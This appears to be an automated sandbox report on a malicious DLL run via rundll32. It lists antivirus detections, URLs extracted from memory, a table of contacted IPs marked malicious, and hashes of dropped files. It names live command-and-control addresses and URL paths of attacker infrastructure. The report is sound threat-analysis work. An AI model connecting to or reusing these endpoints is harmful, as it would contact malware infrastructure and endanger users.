5.2.rundll32.exe.3070000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.5760000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.3480000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.5ca0000.19.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.5420000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.55d0000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
8.2.rundll32.exe.4cc0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.4e60000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
https://45.138.98.34/1	100%	Avira URL Cloud	malware
https://45.138.98.34/	100%	Avira URL Cloud	malware
http://crl.ver)	0%	Avira URL Cloud	safe
https://69.16.218.101:8080/NkSVeNqehcFPnIYSRqyWkDgFYPfQVpAkO	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
https://69.16.218.101:8080/NkSVeNqehcFPnIYSRqyWkDgFYPfQVpAkON	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://69.16.218.101/T	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://45.138.98.34:80/qIFNheLVNvvPNSNxkwhjxonGRMtffKSDvVT	100%	Avira URL Cloud	malware
https://disneyplus.com/legal.	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://69.16.218.101/	0%	Avira URL Cloud	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	false		high
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000021.00000003.568374017.000002A23116C000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567636049.000002A231196000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567551923.000002A231602000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567736212.000002A231621000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567519693.000002A231186000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567531380.000002A231196000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://45.138.98.34/1	rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000010.00000003.306854743.000001B50CE40000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306884229.000001B50CE45000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000010.00000002.307226516.000001B50CE3D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000010.00000002.307226516.000001B50CE3D000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Transit/Stops/	svchost.exe, 00000010.00000003.306756140.000001B50CE67000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307290539.000001B50CE69000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 00000010.00000002.307173784.000001B50CE13000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000010.00000002.307226516.000001B50CE3D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/	svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	false		high
https://45.138.98.34/	rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000010.00000003.306854743.000001B50CE40000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306884229.000001B50CE45000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	false		high
http://crl.ver)	svchost.exe, 0000000C.00000002.603169778.0000023DBF886000.00000004.00000001.sdmp, svchost.exe, 00000021.00000002.587230521.000002A2308E8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000010.00000003.306854743.000001B50CE40000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307245662.000001B50CE4B000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306825607.000001B50CE49000.00000004.00000001.sdmp	false		high
https://69.16.218.101:8080/NkSVeNqehcFPnIYSRqyWkDgFYPfQVpAkO	rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000021.00000003.568771357.000002A2311AD000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.568746551.000002A2311AD000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.568828899.000002A231602000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.568808654.000002A231196000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.568796159.000002A231185000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000010.00000002.307173784.000001B50CE13000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307226516.000001B50CE3D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000010.00000003.306889893.000001B50CE41000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307239059.000001B50CE42000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306854743.000001B50CE40000.00000004.00000001.sdmp	false		high
https://69.16.218.101:8080/NkSVeNqehcFPnIYSRqyWkDgFYPfQVpAkON	rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://%s.xboxlive.com	svchost.exe, 0000000E.00000002.761004522.000002866503E000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://69.16.218.101/T	rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000010.00000003.306805584.000001B50CE4D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307252680.000001B50CE4E000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000010.00000003.306825607.000001B50CE49000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=	svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000010.00000002.307245662.000001B50CE4B000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306825607.000001B50CE49000.00000004.00000001.sdmp	false		high
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000021.00000003.568374017.000002A23116C000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567636049.000002A231196000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567551923.000002A231602000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567736212.000002A231621000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567519693.000002A231186000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567531380.000002A231196000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000010.00000003.306889893.000001B50CE41000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.307239059.000001B50CE42000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306854743.000001B50CE40000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 00000010.00000002.307252680.000001B50CE4E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	false		high
https://45.138.98.34:80/qIFNheLVNvvPNSNxkwhjxonGRMtffKSDvVT	rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://disneyplus.com/legal.	svchost.exe, 00000021.00000003.568374017.000002A23116C000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567636049.000002A231196000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567551923.000002A231602000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567736212.000002A231621000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567519693.000002A231186000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567531380.000002A231196000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000010.00000002.307214272.000001B50CE39000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000010.00000002.307245662.000001B50CE4B000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.306825607.000001B50CE49000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 0000000E.00000002.761004522.000002866503E000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 00000010.00000002.307173784.000001B50CE13000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000010.00000003.306784912.000001B50CE61000.00000004.00000001.sdmp	false		high
http://help.disneyplus.com.	svchost.exe, 00000021.00000003.568374017.000002A23116C000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567636049.000002A231196000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567551923.000002A231602000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567736212.000002A231621000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567519693.000002A231186000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.567531380.000002A231196000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://69.16.218.101/	rundll32.exe, 0000000A.00000003.287598003.0000000003514000.00000004.00000001.sdmp, rundll32.exe, 0000000A.00000002.762430065.0000000003514000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000010.00000002.307226516.000001B50CE3D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.284823827.000001B50CE30000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 0000000E.00000002.761004522.000002866503E000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000010.00000003.306825607.000001B50CE49000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
104.131.62.48	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
185.148.168.15	unknown	Germany	44780	EVERSCALE-ASDE	true
51.210.242.234	unknown	France	16276	OVHFR	true
217.182.143.207	unknown	France	16276	OVHFR	true
69.16.218.101	unknown	United States	32244	LIQUIDWEBUS	true
159.69.237.188	unknown	Germany	24940	HETZNER-ASDE	true
45.138.98.34	unknown	Germany	9009	M247GB	true
116.124.128.206	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
185.148.168.220	unknown	Germany	44780	EVERSCALE-ASDE	true
54.37.228.122	unknown	France	16276	OVHFR	true
190.90.233.66	unknown	Colombia	18678	INTERNEXASAESPCO	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
128.199.192.135	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553120
Start date:	14.01.2022
Start time:	10:50:42
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	M2hsMd9hTq (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@31/9@0/29
EGA Information:	Successful, ratio: 80%
HDC Information:	Successful, ratio: 32.1% (good quality ratio 30.7%) Quality average: 76.3% Quality standard deviation: 25.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 43 Number of non-executed functions: 218
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 173.222.108.210, 173.222.108.226, 20.54.110.249 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:51:47	API Interceptor	10x Sleep call for process: svchost.exe modified
10:53:02	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	wg1bXKYOOs.dll	Get hash	malicious	Browse
	8ozP45Xn3V.dll	Get hash	malicious	Browse
	pugKLanrj3.dll	Get hash	malicious	Browse
	CSxylfUJcL.dll	Get hash	malicious	Browse
	nCiZXrlB39.dll	Get hash	malicious	Browse
	bEK6Xc41qp.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsm	Get hash	malicious	Browse
	qJQ5zHpsbm.dll	Get hash	malicious	Browse
	EtUNsUHRzq.dll	Get hash	malicious	Browse
	PyqpE3VUI3.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsm	Get hash	malicious	Browse
	P6h9ZprN2X.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsm	Get hash	malicious	Browse
	P6h9ZprN2X.dll	Get hash	malicious	Browse
	TkXWcfci7G.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.18721.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.3593.xlsm	Get hash	malicious	Browse
104.131.62.48	wg1bXKYOOs.dll	Get hash	malicious	Browse
	8ozP45Xn3V.dll	Get hash	malicious	Browse
	pugKLanrj3.dll	Get hash	malicious	Browse
	CSxylfUJcL.dll	Get hash	malicious	Browse
	nCiZXrlB39.dll	Get hash	malicious	Browse
	bEK6Xc41qp.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsm	Get hash	malicious	Browse
	qJQ5zHpsbm.dll	Get hash	malicious	Browse
	EtUNsUHRzq.dll	Get hash	malicious	Browse
	PyqpE3VUI3.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsm	Get hash	malicious	Browse
	P6h9ZprN2X.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsm	Get hash	malicious	Browse
	P6h9ZprN2X.dll	Get hash	malicious	Browse
	TkXWcfci7G.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.18721.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.3593.xlsm	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	wg1bXKYOOs.dll	Get hash	malicious	Browse	66.42.57.149
	8ozP45Xn3V.dll	Get hash	malicious	Browse	66.42.57.149
	pugKLanrj3.dll	Get hash	malicious	Browse	66.42.57.149
	CSxylfUJcL.dll	Get hash	malicious	Browse	66.42.57.149
	nCiZXrlB39.dll	Get hash	malicious	Browse	66.42.57.149
	bEK6Xc41qp.dll	Get hash	malicious	Browse	66.42.57.149
	vHwdqVl8yP.dll	Get hash	malicious	Browse	66.42.57.149
	wg1bXKYOOs.dll	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsm	Get hash	malicious	Browse	66.42.57.149
	qJQ5zHpsbm.dll	Get hash	malicious	Browse	66.42.57.149
	EtUNsUHRzq.dll	Get hash	malicious	Browse	66.42.57.149
	PyqpE3VUI3.dll	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsm	Get hash	malicious	Browse	66.42.57.149
	P6h9ZprN2X.dll	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsm	Get hash	malicious	Browse	66.42.57.149
	P6h9ZprN2X.dll	Get hash	malicious	Browse	66.42.57.149
	TkXWcfci7G.dll	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsm	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.18721.xlsm	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.3593.xlsm	Get hash	malicious	Browse	66.42.57.149
DIGITALOCEAN-ASNUS	wg1bXKYOOs.dll	Get hash	malicious	Browse	128.199.192.135
	zmbGUZTICp.exe	Get hash	malicious	Browse	188.166.28.199
	8ozP45Xn3V.dll	Get hash	malicious	Browse	128.199.192.135
	pugKLanrj3.dll	Get hash	malicious	Browse	128.199.192.135
	CSxylfUJcL.dll	Get hash	malicious	Browse	128.199.192.135
	nCiZXrlB39.dll	Get hash	malicious	Browse	128.199.192.135
	bEK6Xc41qp.dll	Get hash	malicious	Browse	128.199.192.135
	vHwdqVl8yP.dll	Get hash	malicious	Browse	128.199.192.135
	wg1bXKYOOs.dll	Get hash	malicious	Browse	128.199.192.135
	SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsm	Get hash	malicious	Browse	128.199.192.135
	qJQ5zHpsbm.dll	Get hash	malicious	Browse	128.199.192.135
	EtUNsUHRzq.dll	Get hash	malicious	Browse	128.199.192.135
	tijXCZsbGe.exe	Get hash	malicious	Browse	188.166.28.199
	PyqpE3VUI3.dll	Get hash	malicious	Browse	128.199.192.135
	SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsm	Get hash	malicious	Browse	128.199.192.135
	P6h9ZprN2X.dll	Get hash	malicious	Browse	128.199.192.135
	SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsm	Get hash	malicious	Browse	128.199.192.135
	P6h9ZprN2X.dll	Get hash	malicious	Browse	128.199.192.135
	TkXWcfci7G.dll	Get hash	malicious	Browse	128.199.192.135
	SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsm	Get hash	malicious	Browse	128.199.192.135

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3593198815979092
Encrypted:	false
SSDEEP:	12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5:	BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1:	C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256:	BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512:	00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious:	false
Preview:	.......................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.2494625269555927
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4S:BJiRdwfu2SRU4S
MD5:	F7181E58DBD46FD6667C111BB57ADB6E
SHA1:	26A557E1C7992A5E5B45ADB790734B09C59E2648
SHA-256:	03ED7237861CFBE9DE2AFDC3CC15579F975609AA850F29ECD1D6396761556CA8
SHA-512:	5A4B8DC392E3960E82F73C18D239FAFEB25D13A3F411477A3AAD9A2350401EB1279E8AD94FE267CF4767AE6DDE896D27ECCF79843A8C37C76E54427741B39701
Malicious:	false
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x7a4cdab4, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.25072088032938816
Encrypted:	false
SSDEEP:	384:bDs+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:bDzSB2nSB2RSjlK/+mLesOj1J2
MD5:	0B4230BCE3C5BC298429551F080EC64B
SHA1:	6806B5CEFE5834EAA742874B90DCE6276FA7F9F4
SHA-256:	A59293E5432507411A916322A2BBD533BB47057674819361C551EA5C56AA8CA0
SHA-512:	26206B6AEBF985C8EF10D229A92EAF607C4A4A3644AA6744D305048BF7ACE0F508963DEDC83609699C7FD9368703C385F56FE966AD934982A71B9FCE9E9B14F6
Malicious:	false
Preview:	zL.... ................e.f.3...w........................).....86...z../3...zc.h.(.....86...z....)..............3...w...........................................................................................................B...........@...................................................................................................... .......................................................................................................................................................................................................................................................86...z......................86...z..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07522292829480651
Encrypted:	false
SSDEEP:	3:PY7vKW68NkfUrlXDrWUrdvWUrkfdTYlwsRrTrlXall3Vkttlmlnl:PYrKWzkfUsUhWUw1MBv03
MD5:	205D325AC1F46E66A9DE7B8E779F3C9B
SHA1:	F783E1D4FDFF3148D3280EA06540BBC81ABDB4DF
SHA-256:	F98AC8E0902251EFE71F7DA500DD9376E468F03A48DD5138D2DF6E7E8374F980
SHA-512:	2DEF0D43F09101B4DF16E4DFA5B2CB9A8485B23E571E668C95D66E9994D9851CD39F1222A0063A2F9286375887DA5F3932A0BF72935400D6739381EE3DC3F89E
Malicious:	false
Preview:	3........................................3...w../3...zc.86...z..........86...z..86...z...L.#86...z_.....................86...z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
